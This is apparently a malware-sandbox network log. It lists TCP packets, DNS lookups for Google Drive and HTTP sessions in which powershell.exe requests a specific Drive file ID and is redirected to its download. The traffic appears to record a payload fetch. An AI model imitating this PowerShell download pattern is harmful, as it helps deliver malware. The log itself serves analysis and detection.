                                                                  Nov 20, 2024 16:54:01.717688084 CET44349805142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:54:01.717755079 CET49805443192.168.2.5142.250.181.1
                                                                  Nov 20, 2024 16:54:01.722075939 CET44349805142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:54:01.722155094 CET49805443192.168.2.5142.250.181.1
                                                                  Nov 20, 2024 16:54:01.722235918 CET44349805142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:54:01.722347021 CET49805443192.168.2.5142.250.181.1
                                                                  Nov 20, 2024 16:54:01.727858067 CET44349805142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:54:01.727926970 CET49805443192.168.2.5142.250.181.1
                                                                  Nov 20, 2024 16:54:01.728535891 CET44349805142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:54:01.728661060 CET49805443192.168.2.5142.250.181.1
                                                                  Nov 20, 2024 16:54:01.733650923 CET44349805142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:54:01.733709097 CET49805443192.168.2.5142.250.181.1
                                                                  Nov 20, 2024 16:54:01.733721972 CET44349805142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:54:01.733762026 CET49805443192.168.2.5142.250.181.1
                                                                  Nov 20, 2024 16:54:01.739768982 CET44349805142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:54:01.739927053 CET49805443192.168.2.5142.250.181.1
                                                                  Nov 20, 2024 16:54:01.740303040 CET44349805142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:54:01.740400076 CET49805443192.168.2.5142.250.181.1
                                                                  Nov 20, 2024 16:54:01.753448963 CET44349805142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:54:01.753530979 CET49805443192.168.2.5142.250.181.1
                                                                  Nov 20, 2024 16:54:01.753545046 CET44349805142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:54:01.753618956 CET49805443192.168.2.5142.250.181.1
                                                                  Nov 20, 2024 16:54:01.758116007 CET44349805142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:54:01.758243084 CET49805443192.168.2.5142.250.181.1
                                                                  Nov 20, 2024 16:54:01.758256912 CET44349805142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:54:01.758384943 CET49805443192.168.2.5142.250.181.1
                                                                  Nov 20, 2024 16:54:01.759125948 CET44349805142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:54:01.759181023 CET49805443192.168.2.5142.250.181.1
                                                                  Nov 20, 2024 16:54:01.766836882 CET44349805142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:54:01.766956091 CET49805443192.168.2.5142.250.181.1
                                                                  Nov 20, 2024 16:54:01.768487930 CET44349805142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:54:01.768556118 CET49805443192.168.2.5142.250.181.1
                                                                  Nov 20, 2024 16:54:01.776220083 CET44349805142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:54:01.776304007 CET49805443192.168.2.5142.250.181.1
                                                                  Nov 20, 2024 16:54:01.777339935 CET44349805142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:54:01.777692080 CET49805443192.168.2.5142.250.181.1
                                                                  Nov 20, 2024 16:54:01.784354925 CET44349805142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:54:01.784455061 CET49805443192.168.2.5142.250.181.1
                                                                  Nov 20, 2024 16:54:01.785698891 CET44349805142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:54:01.785749912 CET49805443192.168.2.5142.250.181.1
                                                                  Nov 20, 2024 16:54:01.790695906 CET44349805142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:54:01.790807009 CET49805443192.168.2.5142.250.181.1
                                                                  Nov 20, 2024 16:54:01.791918039 CET44349805142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:54:01.791961908 CET49805443192.168.2.5142.250.181.1
                                                                  Nov 20, 2024 16:54:01.797049999 CET44349805142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:54:01.797111034 CET49805443192.168.2.5142.250.181.1
                                                                  Nov 20, 2024 16:54:01.798347950 CET44349805142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:54:01.798430920 CET49805443192.168.2.5142.250.181.1
                                                                  Nov 20, 2024 16:54:01.803349018 CET44349805142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:54:01.803399086 CET49805443192.168.2.5142.250.181.1
                                                                  Nov 20, 2024 16:54:01.842830896 CET44349805142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:54:01.842935085 CET49805443192.168.2.5142.250.181.1
                                                                  Nov 20, 2024 16:54:01.877235889 CET44349805142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:54:01.877363920 CET49805443192.168.2.5142.250.181.1
                                                                  Nov 20, 2024 16:54:01.878119946 CET44349805142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:54:02.151994944 CET44349805142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:54:02.152045965 CET49805443192.168.2.5142.250.181.1
                                                                  Nov 20, 2024 16:54:02.152695894 CET44349805142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:54:02.152749062 CET49805443192.168.2.5142.250.181.1
                                                                  Nov 20, 2024 16:54:02.152767897 CET44349805142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:54:02.152812004 CET49805443192.168.2.5142.250.181.1
                                                                  Nov 20, 2024 16:54:02.164743900 CET44349805142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:54:02.164861917 CET49805443192.168.2.5142.250.181.1
                                                                  Nov 20, 2024 16:54:02.164988995 CET44349805142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:54:02.165030003 CET49805443192.168.2.5142.250.181.1
                                                                  Nov 20, 2024 16:54:02.165046930 CET44349805142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:54:02.165082932 CET49805443192.168.2.5142.250.181.1
                                                                  Nov 20, 2024 16:54:02.165091038 CET44349805142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:54:02.165160894 CET49805443192.168.2.5142.250.181.1
                                                                  Nov 20, 2024 16:54:02.166114092 CET44349805142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:54:02.166161060 CET49805443192.168.2.5142.250.181.1
                                                                  Nov 20, 2024 16:54:02.166306973 CET44349805142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:54:02.166346073 CET49805443192.168.2.5142.250.181.1
                                                                  Nov 20, 2024 16:54:02.178965092 CET44349805142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:54:02.179337025 CET44349805142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:54:02.179342985 CET49805443192.168.2.5142.250.181.1
                                                                  Nov 20, 2024 16:54:02.179359913 CET44349805142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:54:02.179373026 CET49805443192.168.2.5142.250.181.1
                                                                  Nov 20, 2024 16:54:02.179425001 CET49805443192.168.2.5142.250.181.1
                                                                  Nov 20, 2024 16:54:02.179474115 CET44349805142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:54:02.179516077 CET49805443192.168.2.5142.250.181.1
                                                                  Nov 20, 2024 16:54:02.180479050 CET44349805142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:54:02.180665016 CET49805443192.168.2.5142.250.181.1
                                                                  Nov 20, 2024 16:54:02.181159019 CET44349805142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:54:02.181219101 CET49805443192.168.2.5142.250.181.1
                                                                  Nov 20, 2024 16:54:02.187951088 CET44349805142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:54:02.188014984 CET49805443192.168.2.5142.250.181.1
                                                                  Nov 20, 2024 16:54:02.188030005 CET44349805142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:54:02.188066959 CET49805443192.168.2.5142.250.181.1
                                                                  Nov 20, 2024 16:54:02.188323975 CET44349805142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:54:02.188365936 CET49805443192.168.2.5142.250.181.1
                                                                  Nov 20, 2024 16:54:02.188468933 CET44349805142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:54:02.188508987 CET49805443192.168.2.5142.250.181.1
                                                                  Nov 20, 2024 16:54:02.189279079 CET44349805142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:54:02.189317942 CET49805443192.168.2.5142.250.181.1
                                                                  Nov 20, 2024 16:54:02.189393044 CET44349805142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:54:02.189538002 CET49805443192.168.2.5142.250.181.1
                                                                  Nov 20, 2024 16:54:02.209317923 CET44349805142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:54:02.209372997 CET49805443192.168.2.5142.250.181.1
                                                                  Nov 20, 2024 16:54:02.209427118 CET44349805142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:54:02.209470034 CET49805443192.168.2.5142.250.181.1
                                                                  Nov 20, 2024 16:54:02.209702015 CET44349805142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:54:02.209743977 CET49805443192.168.2.5142.250.181.1
                                                                  Nov 20, 2024 16:54:02.209815979 CET44349805142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:54:02.209871054 CET49805443192.168.2.5142.250.181.1
                                                                  Nov 20, 2024 16:54:02.210650921 CET44349805142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:54:02.210740089 CET49805443192.168.2.5142.250.181.1
                                                                  Nov 20, 2024 16:54:02.211616039 CET44349805142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:54:02.211730003 CET49805443192.168.2.5142.250.181.1
                                                                  Nov 20, 2024 16:54:02.223381042 CET44349805142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:54:02.223496914 CET49805443192.168.2.5142.250.181.1
                                                                  Nov 20, 2024 16:54:02.223512888 CET44349805142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:54:02.223579884 CET49805443192.168.2.5142.250.181.1
                                                                  Nov 20, 2024 16:54:02.223798990 CET44349805142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:54:02.223846912 CET49805443192.168.2.5142.250.181.1
                                                                  Nov 20, 2024 16:54:02.223901033 CET44349805142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:54:02.223942995 CET49805443192.168.2.5142.250.181.1
                                                                  Nov 20, 2024 16:54:02.224858046 CET44349805142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:54:02.224987984 CET49805443192.168.2.5142.250.181.1
                                                                  Nov 20, 2024 16:54:02.225817919 CET44349805142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:54:02.225851059 CET49805443192.168.2.5142.250.181.1
                                                                  Nov 20, 2024 16:54:02.234025002 CET44349805142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:54:02.234325886 CET49805443192.168.2.5142.250.181.1
                                                                  Nov 20, 2024 16:54:02.234334946 CET44349805142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:54:02.234384060 CET49805443192.168.2.5142.250.181.1
                                                                  Nov 20, 2024 16:54:02.234508991 CET44349805142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:54:02.234605074 CET49805443192.168.2.5142.250.181.1
                                                                  Nov 20, 2024 16:54:02.235117912 CET44349805142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:54:02.235218048 CET49805443192.168.2.5142.250.181.1
                                                                  Nov 20, 2024 16:54:02.235361099 CET44349805142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:54:02.235465050 CET49805443192.168.2.5142.250.181.1
                                                                  Nov 20, 2024 16:54:02.236092091 CET44349805142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:54:02.236215115 CET49805443192.168.2.5142.250.181.1
                                                                  Nov 20, 2024 16:54:02.314424038 CET44349805142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:54:02.314521074 CET49805443192.168.2.5142.250.181.1
                                                                  Nov 20, 2024 16:54:02.314625978 CET44349805142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:54:02.314677000 CET49805443192.168.2.5142.250.181.1
                                                                  Nov 20, 2024 16:54:02.314688921 CET44349805142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:54:02.314743042 CET49805443192.168.2.5142.250.181.1
                                                                  Nov 20, 2024 16:54:02.314752102 CET44349805142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:54:02.314810038 CET49805443192.168.2.5142.250.181.1
                                                                  Nov 20, 2024 16:54:02.316239119 CET44349805142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:54:02.316303015 CET49805443192.168.2.5142.250.181.1
                                                                  Nov 20, 2024 16:54:02.316762924 CET44349805142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:54:02.316804886 CET49805443192.168.2.5142.250.181.1
                                                                  Nov 20, 2024 16:54:02.316854000 CET44349805142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:54:02.316889048 CET49805443192.168.2.5142.250.181.1
                                                                  Nov 20, 2024 16:54:02.317388058 CET44349805142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:54:02.317550898 CET49805443192.168.2.5142.250.181.1
                                                                  Nov 20, 2024 16:54:02.317562103 CET44349805142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:54:02.317598104 CET49805443192.168.2.5142.250.181.1
                                                                  Nov 20, 2024 16:54:02.318097115 CET44349805142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:54:02.318142891 CET49805443192.168.2.5142.250.181.1
                                                                  Nov 20, 2024 16:54:02.318276882 CET44349805142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:54:02.318309069 CET49805443192.168.2.5142.250.181.1
                                                                  Nov 20, 2024 16:54:02.319261074 CET44349805142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:54:02.319355011 CET49805443192.168.2.5142.250.181.1
                                                                  Nov 20, 2024 16:54:02.319964886 CET44349805142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:54:02.320076942 CET49805443192.168.2.5142.250.181.1
                                                                  Nov 20, 2024 16:54:02.320091009 CET44349805142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:54:02.320125103 CET49805443192.168.2.5142.250.181.1
                                                                  Nov 20, 2024 16:54:02.320979118 CET44349805142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:54:02.321059942 CET49805443192.168.2.5142.250.181.1
                                                                  Nov 20, 2024 16:54:02.321160078 CET44349805142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:54:02.321199894 CET49805443192.168.2.5142.250.181.1
                                                                  Nov 20, 2024 16:54:02.321943998 CET44349805142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:54:02.322007895 CET49805443192.168.2.5142.250.181.1
                                                                  Nov 20, 2024 16:54:02.322735071 CET44349805142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:54:02.322778940 CET49805443192.168.2.5142.250.181.1
                                                                  Nov 20, 2024 16:54:02.322839975 CET44349805142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:54:02.322936058 CET49805443192.168.2.5142.250.181.1
                                                                  Nov 20, 2024 16:54:02.323735952 CET44349805142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:54:02.323786974 CET49805443192.168.2.5142.250.181.1
                                                                  Nov 20, 2024 16:54:02.323848009 CET44349805142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:54:02.323888063 CET49805443192.168.2.5142.250.181.1
                                                                  Nov 20, 2024 16:54:02.324883938 CET44349805142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:54:02.325021982 CET49805443192.168.2.5142.250.181.1
                                                                  Nov 20, 2024 16:54:02.325030088 CET44349805142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:54:02.325067043 CET49805443192.168.2.5142.250.181.1
                                                                  Nov 20, 2024 16:54:02.325560093 CET44349805142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:54:02.325638056 CET49805443192.168.2.5142.250.181.1
                                                                  Nov 20, 2024 16:54:02.326478958 CET44349805142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:54:02.326524973 CET49805443192.168.2.5142.250.181.1
                                                                  Nov 20, 2024 16:54:02.326575994 CET44349805142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:54:02.326616049 CET49805443192.168.2.5142.250.181.1
                                                                  Nov 20, 2024 16:54:02.326622963 CET44349805142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:54:02.326653957 CET49805443192.168.2.5142.250.181.1
                                                                  Nov 20, 2024 16:54:02.327735901 CET44349805142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:54:02.328046083 CET49805443192.168.2.5142.250.181.1
                                                                  Nov 20, 2024 16:54:02.328327894 CET44349805142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:54:02.328447104 CET49805443192.168.2.5142.250.181.1
                                                                  Nov 20, 2024 16:54:02.328454971 CET44349805142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:54:02.328489065 CET49805443192.168.2.5142.250.181.1
                                                                  Nov 20, 2024 16:54:02.329310894 CET44349805142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:54:02.329351902 CET49805443192.168.2.5142.250.181.1
                                                                  Nov 20, 2024 16:54:02.329396009 CET44349805142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:54:02.329735994 CET49805443192.168.2.5142.250.181.1
                                                                  Nov 20, 2024 16:54:02.330457926 CET44349805142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:54:02.330574989 CET49805443192.168.2.5142.250.181.1
                                                                  Nov 20, 2024 16:54:02.331118107 CET44349805142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:54:02.331163883 CET49805443192.168.2.5142.250.181.1
                                                                  Nov 20, 2024 16:54:02.331326008 CET44349805142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:54:02.331382036 CET49805443192.168.2.5142.250.181.1
                                                                  Nov 20, 2024 16:54:02.332101107 CET44349805142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:54:02.332155943 CET49805443192.168.2.5142.250.181.1
                                                                  Nov 20, 2024 16:54:02.332248926 CET44349805142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:54:02.332633018 CET49805443192.168.2.5142.250.181.1
                                                                  Nov 20, 2024 16:54:02.333199978 CET44349805142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:54:02.333329916 CET49805443192.168.2.5142.250.181.1
                                                                  Nov 20, 2024 16:54:02.333601952 CET44349805142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:54:02.333867073 CET49805443192.168.2.5142.250.181.1
                                                                  Nov 20, 2024 16:54:02.334114075 CET44349805142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:54:02.334280014 CET49805443192.168.2.5142.250.181.1
                                                                  Nov 20, 2024 16:54:02.334844112 CET44349805142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:54:02.335812092 CET49805443192.168.2.5142.250.181.1
                                                                  Nov 20, 2024 16:54:02.336889029 CET44349805142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:54:02.337030888 CET49805443192.168.2.5142.250.181.1
                                                                  Nov 20, 2024 16:54:02.337114096 CET44349805142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:54:02.337244034 CET49805443192.168.2.5142.250.181.1
                                                                  Nov 20, 2024 16:54:02.337251902 CET44349805142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:54:02.337287903 CET49805443192.168.2.5142.250.181.1
                                                                  Nov 20, 2024 16:54:02.338062048 CET44349805142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:54:02.338159084 CET49805443192.168.2.5142.250.181.1
                                                                  Nov 20, 2024 16:54:02.338165045 CET44349805142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:54:02.338198900 CET49805443192.168.2.5142.250.181.1
                                                                  Nov 20, 2024 16:54:02.339265108 CET44349805142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:54:02.339324951 CET49805443192.168.2.5142.250.181.1
                                                                  Nov 20, 2024 16:54:02.349178076 CET44349805142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:54:02.349240065 CET44349805142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:54:02.349248886 CET49805443192.168.2.5142.250.181.1
                                                                  Nov 20, 2024 16:54:02.349258900 CET44349805142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:54:02.349276066 CET49805443192.168.2.5142.250.181.1
                                                                  Nov 20, 2024 16:54:02.349308968 CET49805443192.168.2.5142.250.181.1
                                                                  Nov 20, 2024 16:54:02.349313021 CET44349805142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:54:02.349344015 CET49805443192.168.2.5142.250.181.1
                                                                  Nov 20, 2024 16:54:02.349916935 CET44349805142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:54:02.349957943 CET49805443192.168.2.5142.250.181.1
                                                                  Nov 20, 2024 16:54:02.350079060 CET44349805142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:54:02.350238085 CET49805443192.168.2.5142.250.181.1
                                                                  Nov 20, 2024 16:54:02.363248110 CET44349805142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:54:02.363332987 CET49805443192.168.2.5142.250.181.1
                                                                  Nov 20, 2024 16:54:02.363387108 CET44349805142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:54:02.363456011 CET49805443192.168.2.5142.250.181.1
                                                                  Nov 20, 2024 16:54:02.363523960 CET44349805142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:54:02.363560915 CET49805443192.168.2.5142.250.181.1
                                                                  Nov 20, 2024 16:54:02.363661051 CET44349805142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:54:02.364052057 CET49805443192.168.2.5142.250.181.1
                                                                  Nov 20, 2024 16:54:02.364962101 CET44349805142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:54:02.365125895 CET49805443192.168.2.5142.250.181.1
                                                                  Nov 20, 2024 16:54:02.365394115 CET44349805142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:54:02.365641117 CET49805443192.168.2.5142.250.181.1
                                                                  Nov 20, 2024 16:54:02.375231981 CET44349805142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:54:02.375478029 CET49805443192.168.2.5142.250.181.1
                                                                  Nov 20, 2024 16:54:02.375488043 CET44349805142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:54:02.375515938 CET44349805142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:54:02.375626087 CET49805443192.168.2.5142.250.181.1
                                                                  Nov 20, 2024 16:54:02.375626087 CET49805443192.168.2.5142.250.181.1
                                                                  Nov 20, 2024 16:54:02.376434088 CET44349805142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:54:02.377393007 CET44349805142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:54:02.377435923 CET49805443192.168.2.5142.250.181.1
                                                                  Nov 20, 2024 16:54:02.377448082 CET44349805142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:54:02.377468109 CET49805443192.168.2.5142.250.181.1
                                                                  Nov 20, 2024 16:54:02.378931999 CET49805443192.168.2.5142.250.181.1
                                                                  Nov 20, 2024 16:54:02.389460087 CET44349805142.250.181.1192.168.2.5
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 20, 2024 16:53:14.747524023 CET | 56821 | 53 | 192.168.2.5 | 1.1.1.1
Nov 20, 2024 16:53:14.888644934 CET | 53 | 56821 | 1.1.1.1 | 192.168.2.5
Nov 20, 2024 16:53:17.582505941 CET | 51931 | 53 | 192.168.2.5 | 1.1.1.1
Nov 20, 2024 16:53:17.815152884 CET | 53 | 51931 | 1.1.1.1 | 192.168.2.5

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Nov 20, 2024 16:53:14.747524023 CET | 192.168.2.5 | 1.1.1.1 | 0xd460 | Standard query (0) | drive.google.com | A (IP address) | IN (0x0001) | false
Nov 20, 2024 16:53:17.582505941 CET | 192.168.2.5 | 1.1.1.1 | 0x7dcc | Standard query (0) | drive.usercontent.google.com | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Nov 20, 2024 16:53:14.888644934 CET | 1.1.1.1 | 192.168.2.5 | 0xd460 | No error (0) | drive.google.com |  | 172.217.19.174 | A (IP address) | IN (0x0001) | false
Nov 20, 2024 16:53:17.815152884 CET | 1.1.1.1 | 192.168.2.5 | 0x7dcc | No error (0) | drive.usercontent.google.com |  | 142.250.181.1 | A (IP address) | IN (0x0001) | false

                                                                  • drive.google.com
                                                                  • drive.usercontent.google.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49718 | 172.217.19.174 | 443 | 7364 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp | Bytes transferred | Direction | Data
2024-11-20 15:53:16 UTC | 215 | OUT | GET /uc?export=download&id=1ziYxCjUvj99QtXQjBjAxMsemo3EX9D8j HTTP/1.1
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                  Host: drive.google.com
                                                                  Connection: Keep-Alive
2024-11-20 15:53:17 UTC | 1766 | IN | HTTP/1.1 303 See Other
                                                                  Content-Type: application/binary
                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                  Pragma: no-cache
                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                  Date: Wed, 20 Nov 2024 15:53:17 GMT
                                                                  Location: https://drive.usercontent.google.com/download?id=1ziYxCjUvj99QtXQjBjAxMsemo3EX9D8j&export=download
                                                                  Strict-Transport-Security: max-age=31536000
                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                  Content-Security-Policy: script-src 'nonce-nmoQoNEwS1_R-9ViBgmz0A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                  Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                  Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data:;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                  Server: ESF
                                                                  Content-Length: 0
                                                                  X-XSS-Protection: 0
                                                                  X-Frame-Options: SAMEORIGIN
                                                                  X-Content-Type-Options: nosniff
                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                  Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.5 | 49723 | 172.217.19.174 | 443 | 7364 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp | Bytes transferred | Direction | Data
2024-11-20 15:53:23 UTC | 97 | OUT | GET /uc?export=download&id=1ziYxCjUvj99QtXQjBjAxMsemo3EX9D8j HTTP/1.1
                                                                  Host: drive.google.com
2024-11-20 15:53:24 UTC | 1319 | IN | HTTP/1.1 303 See Other
                                                                  Content-Type: application/binary
                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                  Pragma: no-cache
                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                  Date: Wed, 20 Nov 2024 15:53:24 GMT
                                                                  Location: https://drive.usercontent.google.com/download?id=1ziYxCjUvj99QtXQjBjAxMsemo3EX9D8j&export=download
                                                                  Strict-Transport-Security: max-age=31536000
                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                  Content-Security-Policy: script-src 'report-sample' 'nonce-7QOKSIQNMt54WMvNrzLm3g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                  Server: ESF
                                                                  Content-Length: 0
                                                                  X-XSS-Protection: 0
                                                                  X-Frame-Options: SAMEORIGIN
